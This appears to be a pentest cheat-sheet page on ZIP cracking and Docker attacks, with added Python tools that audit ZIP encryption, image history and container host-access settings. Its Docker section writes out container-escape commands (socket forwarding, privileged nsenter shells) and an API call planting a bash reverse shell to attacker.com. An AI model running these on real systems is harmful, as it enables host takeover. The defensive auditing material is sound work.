skywhi@dreamland:/var/log$ _


General and miscellaneous items


Default Credentials

Password cracking

ZIP files

Use fcrackzip to crack passwords for ZIP files with a dictionary or brute-force.

Programs like bkcrack or pkcrack perform a known-plaintext attack against archives protected with the legacy ZipCrypto scheme: given part of one entry's plaintext, they recover the internal keys and thus the original data without the password. Entries encrypted with AES (WinZip AE-x) are not affected.
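Whether a known-plaintext attack is even applicable depends on which scheme the archive uses, which is recorded in each entry's central-directory header (general-purpose flag bit 0 marks an encrypted entry; compression method 99 marks WinZip AES). The following is an added example, not code from the page or from the fcrackzip/bkcrack projects: it builds a small constructed archive in memory and then parses the central directory to report the scheme per entry, so an archive can be triaged before anyone relies on its password protection.

```python
import struct
import zlib

# Header layouts from the PKWARE APPNOTE (little-endian).
LOCAL_HDR = "<IHHHHHIIIHH"          # 30 bytes
CENTRAL_HDR = "<IHHHHHHIIIHHHHHII"  # 46 bytes
EOCD = "<IHHHHIIH"                  # 22 bytes
AES_METHOD = 99                     # WinZip AE-x marker in the "compression method" field
FLAG_ENCRYPTED = 0x0001             # general-purpose bit 0


def build_zip(entries):
    """Build a minimal stored (method 0) ZIP in memory; constructed test data only.

    entries: iterable of (name, payload, flags, method). Payloads of 'encrypted'
    entries are placeholder bytes: this helper only has to emit parseable headers.
    """
    entries = list(entries)
    body, central = bytearray(), bytearray()
    for name, payload, flags, method in entries:
        nb = name.encode()
        offset = len(body)
        crc = zlib.crc32(payload)
        body += struct.pack(LOCAL_HDR, 0x04034B50, 20, flags, method, 0, 0,
                            crc, len(payload), len(payload), len(nb), 0)
        body += nb + payload
        central += struct.pack(CENTRAL_HDR, 0x02014B50, 20, 20, flags, method, 0, 0,
                               crc, len(payload), len(payload), len(nb),
                               0, 0, 0, 0, 0, offset)
        central += nb
    cd_offset = len(body)
    body += central
    n = len(entries)
    body += struct.pack(EOCD, 0x06054B50, 0, 0, n, n, len(central), cd_offset, 0)
    return bytes(body)


def audit_zip(buf):
    """Return one record per entry stating which protection scheme it uses."""
    eocd = buf.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, count, _, cd_offset, _ = struct.unpack(EOCD, buf[eocd:eocd + 22])
    entries, pos = [], cd_offset
    for _ in range(count):
        f = struct.unpack(CENTRAL_HDR, buf[pos:pos + 46])
        if f[0] != 0x02014B50:
            raise ValueError("central directory header expected at offset %d" % pos)
        flags, method, nlen, xlen, clen = f[3], f[4], f[10], f[11], f[12]
        name = buf[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        if not flags & FLAG_ENCRYPTED:
            scheme = "none"
        elif method == AES_METHOD:
            scheme = "AES"        # WinZip AES: the ZipCrypto known-plaintext attack does not apply
        else:
            scheme = "ZipCrypto"  # legacy PKWARE stream cipher: known-plaintext attack applies
        entries.append({"name": name, "encrypted": bool(flags & FLAG_ENCRYPTED),
                        "method": method, "scheme": scheme})
        pos += 46 + nlen + xlen + clen
    return entries


# Constructed sample archive: one clear entry, one ZipCrypto entry, one AES entry.
SAMPLE_ZIP = build_zip([
    ("readme.txt", b"nothing secret here", 0, 0),
    ("legacy.bin", b"\x00" * 24, FLAG_ENCRYPTED, 0),
    ("modern.bin", b"\x00" * 24, FLAG_ENCRYPTED, AES_METHOD),
])

if __name__ == "__main__":
    for e in audit_zip(SAMPLE_ZIP):
        print(f"{e['name']:12} encrypted={e['encrypted']!s:5} scheme={e['scheme']}")
```

Run it against a real archive with `audit_zip(open(path, "rb").read())`; any entry reported as ZipCrypto is the one whose protection should not be trusted, regardless of password strength.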

Kubernetes

Guides

A guide to risky permissions by CyberArk, along with their pentest methodology (parts 1, 2 and 3).

Docker

Static image analysis

Use tools like dive, container-diff or simply docker history to inspect Docker images and their layers.
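What `docker history` prints comes from the image config's `history` array, and a `docker save` tarball carries that config next to `manifest.json`, so the same review can be done offline on an exported image. The following is an added example, not code from the page or from dive/container-diff: it constructs a sample tarball in the `docker save` layout (layer tars omitted, since only metadata is read), rebuilds the layer/step table, and flags a few things a reviewer looks for: build steps that pipe downloads into a shell or set setuid bits, secret-looking ENV values, and a missing USER. The regexes are deliberately simple heuristics.

```python
import io
import json
import re
import tarfile

# Heuristics applied to each build step (the "CREATED BY" column of docker history).
STEP_CHECKS = (
    ("pipe-to-shell", re.compile(r"(curl|wget)[^|]*\|\s*(ba|z|da)?sh\b")),
    ("setuid-chmod", re.compile(r"chmod\s+(?:[ugo]*\+s|[4-7][0-7]{3})\b")),
)
SECRET_ENV = re.compile(r"^[A-Za-z_]*(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY)=", re.I)


def build_sample_image_tar():
    """Constructed sample in `docker save` layout: manifest.json plus the image config."""
    config = {
        "config": {"User": "", "Env": ["PATH=/usr/local/bin:/usr/bin", "DB_PASSWORD=hunter2"]},
        "history": [
            {"created_by": "/bin/sh -c #(nop) ADD file:0123 in / "},
            {"created_by": "/bin/sh -c apt-get update && apt-get install -y curl"},
            {"created_by": "/bin/sh -c curl -s http://example.invalid/setup.sh | sh"},
            {"created_by": "/bin/sh -c #(nop)  ENV DB_PASSWORD=hunter2", "empty_layer": True},
        ],
        "rootfs": {"type": "layers",
                   "diff_ids": ["sha256:layer1", "sha256:layer2", "sha256:layer3"]},
    }
    manifest = [{"Config": "config.json", "RepoTags": ["sample/app:1.0"],
                 "Layers": ["l1/layer.tar", "l2/layer.tar", "l3/layer.tar"]}]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, obj in (("manifest.json", manifest), ("config.json", config)):
            data = json.dumps(obj).encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def inspect_image_tar(tar_bytes):
    """Reconstruct the layer/step table of an image tarball and flag risky metadata."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        image = json.load(tar.extractfile("manifest.json"))[0]
        config = json.load(tar.extractfile(image["Config"]))
    layers = image.get("Layers", [])
    steps, findings, layer_idx = [], [], 0
    for step in config.get("history", []):
        cmd = step.get("created_by", "")
        layer = None
        if not step.get("empty_layer"):       # only filesystem-changing steps own a layer
            layer = layers[layer_idx] if layer_idx < len(layers) else None
            layer_idx += 1
        steps.append((layer, cmd))
        for kind, rx in STEP_CHECKS:
            if rx.search(cmd):
                findings.append((kind, cmd))
    runtime = config.get("config") or {}
    for env in runtime.get("Env") or []:
        if SECRET_ENV.match(env):
            findings.append(("env-secret", env.split("=", 1)[0]))
    if not runtime.get("User"):
        findings.append(("root-user", "no USER set; processes start as uid 0"))
    return {"tags": image.get("RepoTags", []), "steps": steps, "findings": findings}


if __name__ == "__main__":
    report = inspect_image_tar(build_sample_image_tar())
    for layer, cmd in report["steps"]:
        print(f"{layer or '<no layer>':14} {cmd}")
    for kind, detail in report["findings"]:
        print(f"[{kind}] {detail}")
```

For a real image, `docker save image:tag > image.tar` and pass the file's bytes to `inspect_image_tar`; multi-image tarballs have one manifest entry per image, and this example only reads the first.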

Interact with a remote Docker instance through the socket

$ # Forward the socket through SSH
$ ssh [-nNT] -L localhost:4444:/var/run/docker.sock user@remote.com
$ # Now we can execute docker commands remotely
$ docker -H tcp://127.0.0.1:4444 run -v /:/host -it ubuntu:latest
$ # Or curl the API
$ curl --proxy localhost:4444 http://localhost/info
$ # Or get a shell on the host
$ docker -H tcp://127.0.0.1:4444 run --privileged --pid=host -it ubuntu nsenter -t 1 -m -u -n -i sh

API

Use the following to create a container that will run cmd upon start and mount the host's root filesystem under /mnt:

$ cmd="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'\\\"\"]"
$ # Binds must be nested under HostConfig; a top-level "Binds" key is silently ignored by the daemon
$ curl -s -X POST --proxy localhost:2377 -d "{\"Image\":\"ubuntu\",\"Cmd\":$cmd,\"HostConfig\":{\"Binds\":[\"/:/mnt:rw\"]}}" -H 'Content-Type: application/json' 'http://localhost/containers/create?name=malicious'
$ curl -s -X POST --proxy localhost:2377 "http://localhost/containers/malicious/start"

Shell on the host

Get a shell on the host with this (source):

$ docker run --privileged --pid=host -it alpine:3.8 nsenter -t 1 -m -u -n -i sh
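Every technique in the Docker sections above (socket forwarding, the create/start API calls, the nsenter shell) ends with a container whose configuration is visible through the same Engine API: `--privileged`, `--pid=host` and a bind of `/` all show up in `/containers/{id}/json`. The following is an added example, not code from the page: it queries the daemon over its Unix socket with only the standard library (the `UnixHTTPConnection` class and the default socket path are assumptions of this example) and flags containers whose settings amount to host access. The two inspect documents at the bottom are constructed samples trimmed to the fields the audit reads, so the audit itself runs offline.

```python
import http.client
import json
import socket

DOCKER_SOCK = "/var/run/docker.sock"  # default daemon socket; adjust if the daemon is elsewhere


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over a Unix socket (the stdlib only speaks TCP out of the box)."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def docker_get(path, sock_path=DOCKER_SOCK):
    """GET a Docker Engine API path over the socket and decode the JSON body."""
    conn = UnixHTTPConnection(sock_path)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        body = resp.read()
    finally:
        conn.close()
    if resp.status != 200:
        raise RuntimeError(f"{path}: HTTP {resp.status} {body[:200]!r}")
    return json.loads(body)


def audit_container(inspect):
    """Flag settings in one inspect document that amount to host access."""
    hc = inspect.get("HostConfig") or {}
    findings = set()
    if hc.get("Privileged"):
        findings.add("privileged")
    if hc.get("PidMode") == "host":
        findings.add("pid-host")
    caps = set()
    for c in hc.get("CapAdd") or []:
        c = c.upper()
        caps.add(c[4:] if c.startswith("CAP_") else c)
    if caps & {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE"}:
        findings.add("dangerous-capability")
    # Bind sources appear both in HostConfig.Binds (as created) and in Mounts (as resolved).
    sources = [b.split(":")[0] for b in hc.get("Binds") or []]
    sources += [m.get("Source", "") for m in inspect.get("Mounts") or []
                if m.get("Type") == "bind"]
    for src in sources:
        if src == "/":
            findings.add("host-root-mount")
        elif src.rstrip("/") in ("/var/run/docker.sock", "/run/docker.sock"):
            findings.add("docker-socket-mount")
    return sorted(findings)


def audit_daemon(sock_path=DOCKER_SOCK):
    """Inspect every container (running or not) and return {name: findings}."""
    report = {}
    for c in docker_get("/containers/json?all=1", sock_path):
        findings = audit_container(docker_get(f"/containers/{c['Id']}/json", sock_path))
        if findings:
            report[c["Names"][0]] = findings
    return report


# Constructed inspect documents (trimmed to the fields this audit reads).
SAMPLE_ESCAPE = {
    "Name": "/malicious",
    "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/mnt:rw"], "CapAdd": None},
    "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}],
}
SAMPLE_BENIGN = {
    "Name": "/web",
    "HostConfig": {"Privileged": False, "PidMode": "",
                   "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"}],
}

if __name__ == "__main__":
    print(audit_container(SAMPLE_ESCAPE))   # offline demonstration on the constructed sample
    try:
        print(audit_daemon())               # needs read access to the daemon socket
    except (OSError, RuntimeError) as exc:
        print("daemon not reachable:", exc)
```

Running `audit_daemon()` periodically (or on container-create events) is a cheap way to notice the configurations these cheat-sheet commands produce; a mounted daemon socket is flagged separately because it grants the same host access indirectly.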
